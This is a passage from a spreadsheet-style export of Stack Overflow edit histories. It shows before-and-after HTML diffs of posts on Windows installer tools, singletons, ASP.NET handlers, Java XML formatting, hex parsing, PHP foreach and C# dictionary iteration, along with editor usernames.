  &lt;li&gt; XML-based (but schema is not very user-friendly, doesn't really matter as you would use GUI editor anyway)&lt;/li&gt; _x000D_
  &lt;li&gt; The best option if you have only basic installer requirements and don't have time to learn something new.&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;h2&gt;Free installers for Windows developers (ultimate list)&lt;/h2&gt; _x000D_
 &lt;p&gt; &lt;span class="diff-add"&gt;In&lt;/span&gt; progress..&lt;span class="diff-add"&gt;.&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;a href="http://wix.sourceforge.net/" rel="nofollow noreferrer"&gt;WiX&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;strong&gt;Very powerful and flexible&lt;/strong&gt;.&lt;/li&gt; _x000D_
  &lt;li&gt; Can produce MSI packages&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;strong&gt;Almost no documentation&lt;/strong&gt;&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;strong&gt;Very steep learning curve.&lt;/strong&gt;&lt;/li&gt; _x000D_
  &lt;li&gt; XML-based.&lt;/li&gt; _x000D_
  &lt;li&gt; Recommended for very complex installators.&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;a href="http://www.innosetup.com/isinfo.php" rel="nofollow noreferrer"&gt;InnoSetup&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; Cannot produce MSI packages.&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;strong&gt;Based on INI files (less powerful but very low learning curve)&lt;/strong&gt;&lt;/li&gt; _x000D_
  &lt;li&gt; Possibily to inject Pascal procedures for extra flexibility.&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;strong&gt;Probably the best choice for 90% of programs.&lt;/strong&gt;&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;a href="http://nsis.sourceforge.net/Main_Page" rel="nofollow noreferrer"&gt;NSIS&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; Cannot produce MSI packages.&lt;/li&gt; _x000D_
  &lt;li&gt; Fully scripted, very powerful but at cost of high learning curve.&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;strong&gt;Recommened if WiX is too much and InnoSetup is not enough.&lt;/strong&gt;&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;&lt;a href="http://www.advancedinstaller.com" rel="nofollow noreferrer"&gt;AdvancedInstaller&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt; Basic version is free.&lt;/li&gt; _x000D_
  &lt;li&gt; Can produce MSI packages.&lt;/li&gt; _x000D_
  &lt;li&gt;&lt;strong&gt;It has the best user-interface, almost no learning curve to get things done.&lt;/strong&gt;&lt;/li&gt; _x000D_
  &lt;li&gt; XML-based (but schema is not very user-friendly, doesn't really matter as you would use GUI editor anyway)&lt;/li&gt; _x000D_
  &lt;li&gt; The best option if you have only basic installer requirements and don't have time to learn something new.&lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>lubos hasko</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; The &lt;a href="https://en.wikipedia.org/wiki/Singleton_pattern" rel="nofollow noreferrer"&gt;singleton pattern&lt;/a&gt; is a fully paid up member of the &lt;a href="https://en.wikipedia.org/wiki/Design_Patterns" rel="nofollow noreferrer"&gt;GoF&lt;/a&gt;'s &lt;a href="https://rads.stackoverflow.com/amzn/click/com/0201633612" rel="nofollow noreferrer"&gt;patterns book&lt;/a&gt;, but it lately seems rather orphaned by the developer world. I still use quite a lot of singletons, especially for &lt;a href="https://en.wikipedia.org/wiki/Factory_method_pattern" rel="nofollow noreferrer"&gt;factory classes&lt;/a&gt;, and while you have to be a bit careful about multithreading issues (like any class actually), I fail to see why they are so awful.&lt;span class="diff-delete"&gt;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lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; Stack Overflow especially seems to assume that everyone agrees that Singletons are evil. Why?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; The &lt;a href="https://en.wikipedia.org/wiki/Singleton_pattern" rel="nofollow noreferrer"&gt;singleton pattern&lt;/a&gt; is a fully paid up member of the &lt;a href="https://en.wikipedia.org/wiki/Design_Patterns" rel="nofollow noreferrer"&gt;GoF&lt;/a&gt;'s &lt;a href="https://rads.stackoverflow.com/amzn/click/com/0201633612" rel="nofollow noreferrer"&gt;patterns book&lt;/a&gt;, but it lately seems rather orphaned by the developer world. I still use quite a lot of singletons, especially for &lt;a href="https://en.wikipedia.org/wiki/Factory_method_pattern" rel="nofollow noreferrer"&gt;factory classes&lt;/a&gt;, and while you have to be a bit careful about multithreading issues (like any class actually), I fail to see why they are so awful.&lt;/p&gt; _x000D_
 &lt;p&gt; Stack Overflow especially seems to assume that everyone agrees that Singletons are evil. Why?&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm just meddling in the ways of the RESTful web service in C# using ASP.Net 2.0 and have managed (via a class library, a reference to dll produced by the former and some adjustment of my web.config) to coax out a URI format like so:&lt;/p&gt; _x000D_
 &lt;p&gt; http: //localhost/DevelopmentProject/testhandler/?input=thisismyinput&lt;/p&gt; _x000D_
 &lt;p&gt; Which unremarkably just returns the input as a piece of text with the enlightening prefix "Your Input Was: "&lt;/p&gt; _x000D_
 &lt;p&gt; I was under the impression that I could get the URI to become further ensmoothened to something more along the lines of:&lt;/p&gt; _x000D_
 &lt;p&gt; http: //localhost/DevelopmentProject/testhandler/thisismyinput&lt;/p&gt; _x000D_
 &lt;p&gt; and have the same result but have no idea how to get rid of the pesky "?input="&lt;/p&gt; _x000D_
 &lt;p&gt; The entry to the httphandlers section of my web.config is (spaces added so code displays):&lt;/p&gt; _x000D_
 &lt;p&gt; &amp;lt; add &lt;span class="diff-delete"&gt;verb="&lt;/span&gt;&lt;em&gt;&lt;span class="diff-delete"&gt;" path="testhandler/&lt;/span&gt;&lt;/em&gt;&lt;span class="diff-delete"&gt;"&lt;/span&gt; type="HandlerLib.testhandler, HandlerLib"/ &amp;gt;&lt;/p&gt; _x000D_
 &lt;p&gt; I am running IIS 5.1 on the local machine, will this introduce a problem?&lt;/p&gt; _x000D_
 &lt;p&gt; Essentially where am I going wrong?&lt;/p&gt; _x000D_
 &lt;p&gt; Thanks.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; I'm just meddling in the ways of the RESTful web service in C# using ASP.Net 2.0 and have managed (via a class library, a reference to dll produced by the former and some adjustment of my web.config) to coax out a URI format like so:&lt;/p&gt; _x000D_
 &lt;p&gt; http: //localhost/DevelopmentProject/testhandler/?input=thisismyinput&lt;/p&gt; _x000D_
 &lt;p&gt; Which unremarkably just returns the input as a piece of text with the enlightening prefix "Your Input Was: "&lt;/p&gt; _x000D_
 &lt;p&gt; I was under the impression that I could get the URI to become further ensmoothened to something more along the lines of:&lt;/p&gt; _x000D_
 &lt;p&gt; http: //localhost/DevelopmentProject/testhandler/thisismyinput&lt;/p&gt; _x000D_
 &lt;p&gt; and have the same result but have no idea how to get rid of the pesky "?input="&lt;/p&gt; _x000D_
 &lt;p&gt; The entry to the httphandlers section of my web.config is (spaces added so code displays):&lt;/p&gt; _x000D_
 &lt;p&gt; &amp;lt; add &lt;span class="diff-add"&gt;verb="*" path="testhandler/*"&lt;/span&gt; type="HandlerLib.testhandler, HandlerLib"/ &amp;gt;&lt;/p&gt; _x000D_
 &lt;p&gt; I am running IIS 5.1 on the local machine, will this introduce a problem?&lt;/p&gt; _x000D_
 &lt;p&gt; Essentially where am I going wrong?&lt;/p&gt; _x000D_
 &lt;p&gt; Thanks.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>One Monkey</t>
  </si>
  <si>
    <t>MattBelanger</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;String formatXml( org.w3c.dom.Document aDoc ) throws TransformerException{_x000D_
  &lt;/span&gt;  &lt;span class="diff-delete"&gt;java.xml.transform.Transformer&lt;/span&gt; &lt;span class="diff-delete"&gt;transformer=java.xml.transform.&lt;/span&gt;TransformerFactory.newInstance().newTransformer();_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;transformer.setOutputProperty(&lt;span class="diff-delete"&gt;java.xml.transform.&lt;/span&gt;OutputKeys.INDENT,&lt;span class="diff-delete"&gt;"yes");_x000D_
   &lt;/span&gt; &lt;span class="diff-delete"&gt;transformer.setOutputProperty("{http://xml.apache.org/xslt}indent-amount","2"&lt;/span&gt;);_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;//initialize StreamResult with File object to save to file_x000D_
&lt;span class="diff-delete"&gt;  &lt;/span&gt;  &lt;span class="diff-delete"&gt;java.xml.transform.Stream.StreamResult&lt;/span&gt; &lt;span class="diff-delete"&gt;result=new&lt;/span&gt; StreamResult(new StringWriter());_x000D_
&lt;span class="diff-delete"&gt;  &lt;/span&gt;  &lt;span class="diff-delete"&gt;java.xml.transform.dom.DOMSource&lt;/span&gt; &lt;span class="diff-delete"&gt;source=new&lt;/span&gt; DOMSource(doc);_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;transformer.transform(source,result);&lt;span class="diff-delete"&gt;_x000D_
&amp;nbsp;&lt;/span&gt;_x000D_
&lt;span class="diff-delete"&gt;    &lt;/span&gt;String&lt;span class="diff-delete"&gt; xmlString=result.getWriter().toString();_x000D_
    return&lt;/span&gt; &lt;span class="diff-delete"&gt;xmlString;_x000D_
}_x000D_
_x000D_
// based on: http://stackoverflow.com/questions/7607327/how-to-create-a-xml-object-from-string-in-java_x000D_
String formatXml( String xml ) throws TransformerException, ParserConfigurationException, IOException, SAXException{_x000D_
    java.xml.parsers.DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();_x000D_
    java.xml.parsers.DocumentBuilder builder&lt;/span&gt; = &lt;span class="diff-delete"&gt;factory&lt;/span&gt;.&lt;span class="diff-delete"&gt;newDocumentBuilder&lt;/span&gt;()&lt;span class="diff-delete"&gt;;_x000D_
    org&lt;/span&gt;.&lt;span class="diff-delete"&gt;xml.sax.InputSource is = new InputSource(  new StringReader&lt;/span&gt;(&lt;span class="diff-delete"&gt; xml &lt;/span&gt;)&lt;span class="diff-delete"&gt;  )&lt;/span&gt;;_x000D_
&lt;span class="diff-delete"&gt;    org.w3c.dom&lt;/span&gt;.&lt;span class="diff-delete"&gt;Document doc = builder&lt;/span&gt;.&lt;span class="diff-delete"&gt;parse(is);_x000D_
_x000D_
    return formatXml&lt;/span&gt;(&lt;span class="diff-delete"&gt; doc &lt;/span&gt;);&lt;span class="diff-delete"&gt;_x000D_
}&lt;/span&gt;_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Note: Results may vary depending on the Java version. Search for workarounds specific to your platform.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-add"&gt;Transformer&lt;/span&gt; &lt;span class="diff-add"&gt;transformer&lt;/span&gt; &lt;span class="diff-add"&gt;=&lt;/span&gt; TransformerFactory.newInstance().newTransformer();_x000D_
transformer.setOutputProperty(OutputKeys.INDENT, &lt;span class="diff-add"&gt;"yes"&lt;/span&gt;);_x000D_
//initialize StreamResult with File object to save to file_x000D_
&lt;span class="diff-add"&gt;StreamResult&lt;/span&gt; &lt;span class="diff-add"&gt;result&lt;/span&gt; &lt;span class="diff-add"&gt;=&lt;/span&gt; &lt;span class="diff-add"&gt;new&lt;/span&gt; StreamResult(new StringWriter());_x000D_
&lt;span class="diff-add"&gt;DOMSource&lt;/span&gt; &lt;span class="diff-add"&gt;source&lt;/span&gt; &lt;span class="diff-add"&gt;=&lt;/span&gt; &lt;span class="diff-add"&gt;new&lt;/span&gt; DOMSource(doc);_x000D_
transformer.transform(source,&lt;span class="diff-add"&gt; &lt;/span&gt;result);_x000D_
String &lt;span class="diff-add"&gt;xmlString&lt;/span&gt; = &lt;span class="diff-add"&gt;result&lt;/span&gt;.&lt;span class="diff-add"&gt;getWriter&lt;/span&gt;().&lt;span class="diff-add"&gt;toString&lt;/span&gt;();_x000D_
&lt;span class="diff-add"&gt;System&lt;/span&gt;.&lt;span class="diff-add"&gt;out&lt;/span&gt;.&lt;span class="diff-add"&gt;println&lt;/span&gt;(&lt;span class="diff-add"&gt;xmlString&lt;/span&gt;);_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Note: Results may vary depending on the Java version. Search for workarounds specific to your platform.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Boris Treukhov</t>
  </si>
  <si>
    <t>Sled</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; There are &lt;a href="http://en.wikipedia.org/wiki/Point_%28typography%29" rel="nofollow noreferrer"&gt;72 points per inch&lt;/a&gt;; if it is sufficient to assume 96 pixels per inch, the formula is rather simple&lt;span class="diff-delete"&gt; so try it&lt;/span&gt;:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;points = pixels * 72 / 96_x000D_
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; There is a way to get the configured pixels per inch of your display, but it escapes me at the moment.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; The function I was thinking of is &lt;code&gt;&lt;span class="diff-delete"&gt;GetDeviceCaps&lt;/span&gt;&lt;/code&gt;. Microsoft has a guide called &lt;a href="http://msdn.microsoft.com/en-us/library/ms838191.aspx" rel="nofollow noreferrer"&gt;"Developing DPI-Aware Applications"&lt;/a&gt;, look for the section &lt;span class="diff-delete"&gt;Creating &lt;/span&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;DPI-Aware Fonts&lt;/span&gt;&lt;/code&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; There are &lt;a href="http://en.wikipedia.org/wiki/Point_%28typography%29" rel="nofollow noreferrer"&gt;72 points per inch&lt;/a&gt;; if it is sufficient to assume 96 pixels per inch, the formula is rather simple:&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;span class="diff-add"&gt; points = pixels * 72 / 96&lt;/span&gt;&lt;/p&gt; _x000D_
 &lt;p&gt; There is a way to get the configured pixels per inch of your display, but it escapes me at the moment.&lt;/p&gt; _x000D_
 &lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; The function I was thinking of is &lt;span class="diff-add"&gt;GetDeviceCaps&lt;/span&gt;. Microsoft has a guide called &lt;a href="http://msdn.microsoft.com/en-us/library/ms838191.aspx" rel="nofollow noreferrer"&gt;"Developing DPI-Aware Applications"&lt;/a&gt;, look for the section &lt;span class="diff-add"&gt;"Creating DPI-Aware Fonts"&lt;/span&gt;.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Erwin Bolwidt</t>
  </si>
  <si>
    <t>Sumit Pathak</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; The theoretical limit may be 2,147,483,647, but the practical limit is nowhere near that. Since no single object in a .&lt;span class="diff-delete"&gt;NET&lt;/span&gt; program may be over &lt;span class="diff-delete"&gt;2 GB&lt;/span&gt; and the string type uses unicode (&lt;span class="diff-delete"&gt;two&lt;/span&gt; bytes for each character), the best you could do is 1,073,741,823, but you're not likely to ever be able to allocate that on a 32-bit machine.&lt;/p&gt; _x000D_
 &lt;p&gt; This is one of those situations where &lt;span class="diff-delete"&gt;["&lt;/span&gt;&lt;a href="http://blogs.msdn.com/oldnewthing/archive/2007/07/18/3926581.aspx" rel="nofollow noreferrer"&gt;&lt;span class="diff-delete"&gt;If&lt;/span&gt; you have to ask, you're probably doing something wrong.&lt;/a&gt;&lt;span class="diff-delete"&gt;"] is the case.&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; The theoretical limit may be 2,147,483,647, but the practical limit is nowhere near that. Since no single object in a .&lt;span class="diff-add"&gt;Net&lt;/span&gt; program may be over &lt;span class="diff-add"&gt;2GB&lt;/span&gt; and the string type uses unicode (&lt;span class="diff-add"&gt;2&lt;/span&gt; bytes for each character), the best you could do is 1,073,741,823, but you're not likely to ever be able to allocate that on a 32-bit machine.&lt;/p&gt; _x000D_
 &lt;p&gt; This is one of those situations where &lt;a href="http://blogs.msdn.com/oldnewthing/archive/2007/07/18/3926581.aspx" rel="nofollow noreferrer"&gt;&lt;span class="diff-add"&gt;"If&lt;/span&gt; you have to ask, you're probably doing something wrong.&lt;span class="diff-add"&gt;"&lt;/span&gt;&lt;/a&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Maximilian Burszley</t>
  </si>
  <si>
    <t>Sae1962</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Here's a solution that I think is better than any posted so far:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;public static byte[] &lt;span class="diff-delete"&gt;unhexlify&lt;/span&gt;(String &lt;span class="diff-delete"&gt;ss&lt;/span&gt;) {_x000D_
    int &lt;span class="diff-delete"&gt;strlen&lt;/span&gt; = &lt;span class="diff-delete"&gt;ss&lt;/span&gt;.length(&lt;span class="diff-delete"&gt;);_x000D_
    if (strlen&amp;gt;0 &amp;amp;&amp;amp; strlen%2!=0) {_x000D_
        throw new RuntimeException("odd-length string"&lt;/span&gt;);&lt;span class="diff-delete"&gt;_x000D_
    }&lt;/span&gt;_x000D_
    byte[] &lt;span class="diff-delete"&gt;ret&lt;/span&gt; = new &lt;span class="diff-delete"&gt;byte[strlen&lt;/span&gt;/2];_x000D_
    for (int &lt;span class="diff-delete"&gt;i=0; i&amp;lt;strlen; i+=2) {_x000D_
   &lt;/span&gt;     &lt;span class="diff-delete"&gt;int&lt;/span&gt; &lt;span class="diff-delete"&gt;a&lt;/span&gt; &lt;span class="diff-delete"&gt;=&lt;/span&gt; &lt;span class="diff-delete"&gt;Character.digit(ss.charAt(i),0x10&lt;/span&gt;)&lt;span class="diff-delete"&gt;;&lt;/span&gt;_x000D_
        &lt;span class="diff-delete"&gt;int&lt;/span&gt; &lt;span class="diff-delete"&gt;b&lt;/span&gt; = Character.digit(&lt;span class="diff-delete"&gt;ss&lt;/span&gt;.charAt(&lt;span class="diff-delete"&gt;i+1&lt;/span&gt;),&lt;span class="diff-delete"&gt;0x10);_x000D_
       &lt;/span&gt; &lt;span class="diff-delete"&gt;if (a==-1&lt;/span&gt; &lt;span class="diff-delete"&gt;||&lt;/span&gt; &lt;span class="diff-delete"&gt;b==-1&lt;/span&gt;)&lt;span class="diff-delete"&gt; {&lt;/span&gt;_x000D_
            &lt;span class="diff-delete"&gt;throw&lt;/span&gt; &lt;span class="diff-delete"&gt;new&lt;/span&gt; &lt;span class="diff-delete"&gt;RuntimeException("non-hex&lt;/span&gt; &lt;span class="diff-delete"&gt;digit");_x000D_
&lt;/span&gt;        &lt;span class="diff-delete"&gt;}_x000D_
  &lt;/span&gt;      &lt;span class="diff-delete"&gt;ret[i/2] =&lt;/span&gt; (&lt;span class="diff-delete"&gt;byte&lt;/span&gt;) &lt;span class="diff-delete"&gt;((a&amp;lt;&amp;lt;4&lt;/span&gt;)&lt;span class="diff-delete"&gt;+b&lt;/span&gt;);_x000D_
    }_x000D_
    return &lt;span class="diff-delete"&gt;ret;&lt;/span&gt;_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Reasons why it is an improvement:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;p&gt; Safe with leading zeros (unlike BigInteger) and with negative byte values (unlike Byte.parseByte)&lt;/p&gt; &lt;/li&gt; _x000D_
  &lt;li&gt;&lt;p&gt; Doesn't convert the String into a &lt;code&gt;char[]&lt;/code&gt;, or create StringBuilder and String objects for every single byte.&lt;/p&gt; &lt;/li&gt; _x000D_
  &lt;li&gt;&lt;p&gt; No library dependencies that may not be available&lt;/p&gt; &lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; Feel free to add argument checking via &lt;code&gt;assert&lt;/code&gt; or exceptions if the argument is not known to be safe.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Here's a solution that I think is better than any posted so far:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;public static byte[] &lt;span class="diff-add"&gt;hexStringToByteArray&lt;/span&gt;(String &lt;span class="diff-add"&gt;s&lt;/span&gt;) {_x000D_
    int &lt;span class="diff-add"&gt;len&lt;/span&gt; = &lt;span class="diff-add"&gt;s&lt;/span&gt;.length();_x000D_
    byte[] &lt;span class="diff-add"&gt;data&lt;/span&gt; = new &lt;span class="diff-add"&gt;byte[len &lt;/span&gt;/&lt;span class="diff-add"&gt; &lt;/span&gt;2];_x000D_
    for (int &lt;span class="diff-add"&gt;i&lt;/span&gt; &lt;span class="diff-add"&gt;=&lt;/span&gt; &lt;span class="diff-add"&gt;0;&lt;/span&gt; &lt;span class="diff-add"&gt;i&lt;/span&gt; &lt;span class="diff-add"&gt;&amp;lt;&lt;/span&gt; &lt;span class="diff-add"&gt;len;&lt;/span&gt; &lt;span class="diff-add"&gt;i&lt;/span&gt; &lt;span class="diff-add"&gt;+=&lt;/span&gt; &lt;span class="diff-add"&gt;2&lt;/span&gt;)&lt;span class="diff-add"&gt; {&lt;/span&gt;_x000D_
        &lt;span class="diff-add"&gt;data[i&lt;/span&gt; &lt;span class="diff-add"&gt;/ 2]&lt;/span&gt; = &lt;span class="diff-add"&gt;(byte) ((&lt;/span&gt;Character.digit(&lt;span class="diff-add"&gt;s&lt;/span&gt;.charAt(&lt;span class="diff-add"&gt;i&lt;/span&gt;), &lt;span class="diff-add"&gt;16)&lt;/span&gt; &lt;span class="diff-add"&gt;&amp;lt;&amp;lt;&lt;/span&gt; &lt;span class="diff-add"&gt;4&lt;/span&gt;)_x000D_
                             &lt;span class="diff-add"&gt;+&lt;/span&gt; &lt;span class="diff-add"&gt;Character.digit&lt;/span&gt;(&lt;span class="diff-add"&gt;s.charAt(i+1&lt;/span&gt;)&lt;span class="diff-add"&gt;,&lt;/span&gt; &lt;span class="diff-add"&gt;16&lt;/span&gt;));_x000D_
    }_x000D_
    return &lt;span class="diff-add"&gt;data;&lt;/span&gt;_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt; Reasons why it is an improvement:&lt;/p&gt; _x000D_
 &lt;ul&gt; _x000D_
  &lt;li&gt;&lt;p&gt; Safe with leading zeros (unlike BigInteger) and with negative byte values (unlike Byte.parseByte)&lt;/p&gt; &lt;/li&gt; _x000D_
  &lt;li&gt;&lt;p&gt; Doesn't convert the String into a &lt;code&gt;char[]&lt;/code&gt;, or create StringBuilder and String objects for every single byte.&lt;/p&gt; &lt;/li&gt; _x000D_
  &lt;li&gt;&lt;p&gt; No library dependencies that may not be available&lt;/p&gt; &lt;/li&gt; _x000D_
 &lt;/ul&gt; _x000D_
 &lt;p&gt; Feel free to add argument checking via &lt;code&gt;assert&lt;/code&gt; or exceptions if the argument is not known to be safe.&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Dave L.</t>
  </si>
  <si>
    <t>evandrix</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;&lt;span class="diff-delete"&gt;$array = ["foo", "bar"];_x000D_
_x000D_
&lt;/span&gt;foreach($array as&lt;span class="diff-delete"&gt; $key&lt;/span&gt; &lt;span class="diff-delete"&gt;=&amp;gt; $value&lt;/span&gt;) {&lt;span class="diff-delete"&gt;_x000D_
    // $key = 0, $value = foo&lt;/span&gt;_x000D_
    // &lt;span class="diff-delete"&gt;On next iteration: $key = 1, $value =&lt;/span&gt; &lt;span class="diff-delete"&gt;bar&lt;/span&gt;_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;code&gt;$key&lt;/code&gt; is the index of each &lt;code&gt;$array&lt;/code&gt; &lt;span class="diff-delete"&gt;item&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;foreach($array as &lt;span class="diff-add"&gt;$key=&amp;gt;$value&lt;/span&gt;) {_x000D_
    // &lt;span class="diff-add"&gt;do&lt;/span&gt; &lt;span class="diff-add"&gt;stuff&lt;/span&gt;_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
 &lt;p&gt;&lt;code&gt;$key&lt;/code&gt; is the index of each &lt;code&gt;$array&lt;/code&gt; &lt;span class="diff-add"&gt;element&lt;/span&gt;&lt;/p&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>Giacomo1968</t>
  </si>
  <si>
    <t>Robin van Baalen</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Depends on whether you're after the keys or the values...&lt;/p&gt; _x000D_
 &lt;p&gt; From the MSDN &lt;a href="http://msdn.microsoft.com/en-us/library/xfhwa508.aspx" rel="nofollow noreferrer"&gt;&lt;code&gt;Dictionary(TKey, TValue)&lt;/code&gt;&lt;/a&gt; Class description:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;// When you use foreach to enumerate dictionary elements,_x000D_
// the elements are retrieved as KeyValuePair objects._x000D_
Console.WriteLine();_x000D_
foreach( KeyValuePair&amp;lt;string, string&amp;gt; kvp in openWith )_x000D_
{_x000D_
    Console.WriteLine(&lt;span class="diff-delete"&gt;$"Key&lt;/span&gt; = {&lt;span class="diff-delete"&gt;kvp.Key&lt;/span&gt;}, Value = {kvp.Value&lt;span class="diff-delete"&gt;}"&lt;/span&gt;);_x000D_
}_x000D_
_x000D_
// To get the values alone, use the Values property._x000D_
Dictionary&amp;lt;string, string&amp;gt;.ValueCollection valueColl =_x000D_
    openWith.Values;_x000D_
_x000D_
// The elements of the ValueCollection are strongly typed_x000D_
// with the type that was specified for dictionary values._x000D_
Console.WriteLine();_x000D_
foreach( string s in valueColl )_x000D_
{_x000D_
    Console.WriteLine(&lt;span class="diff-delete"&gt;$"Value&lt;/span&gt; = {&lt;span class="diff-delete"&gt;s&lt;/span&gt;}");_x000D_
}_x000D_
_x000D_
// To get the keys alone, use the Keys property._x000D_
Dictionary&amp;lt;string, string&amp;gt;.KeyCollection keyColl =_x000D_
    openWith.Keys;_x000D_
_x000D_
// The elements of the KeyCollection are strongly typed_x000D_
// with the type that was specified for dictionary keys._x000D_
Console.WriteLine();_x000D_
foreach( string s in keyColl )_x000D_
{_x000D_
    Console.WriteLine(&lt;span class="diff-delete"&gt;$"Key&lt;/span&gt; = {&lt;span class="diff-delete"&gt;s&lt;/span&gt;}");_x000D_
}_x000D_
&lt;/code&gt;&lt;/pre&gt; _x000D_
&lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div class="s-prose js-post-body"&gt; _x000D_
 &lt;p&gt; Depends on whether you're after the keys or the values...&lt;/p&gt; _x000D_
 &lt;p&gt; From the MSDN &lt;a href="http://msdn.microsoft.com/en-us/library/xfhwa508.aspx" rel="nofollow noreferrer"&gt;&lt;code&gt;Dictionary(TKey, TValue)&lt;/code&gt;&lt;/a&gt; Class description:&lt;/p&gt; _x000D_
 &lt;pre&gt;&lt;code&gt;// When you use foreach to enumerate dictionary elements,_x000D_
// the elements are retrieved as KeyValuePair objects._x000D_
Console.WriteLine();_x000D_
foreach( KeyValuePair&amp;lt;string, string&amp;gt; kvp in openWith )_x000D_
{_x000D_
    Console.WriteLine(&lt;span class="diff-add"&gt;"Key&lt;/span&gt; = {&lt;span class="diff-add"&gt;0&lt;/span&gt;}, Value = {&lt;span class="diff-add"&gt;1}", _x000D_
        &lt;/span&gt;kvp.&lt;span class="diff-add"&gt;Key, kvp.&lt;/span&gt;Value);_x000D_
}_x000D_
_x000D_
// To get the values alone, use the Values property._x000D_
Dictionary&amp;lt;string, string&amp;gt;.ValueCollection valueColl =_x000D_
    openWith.Values;_x000D_
_x000D_
// The elements of the ValueCollection are strongly typed_x000D_
// with the type that was specified for dictionary values._x000D_
Console.WriteLine();_x000D_
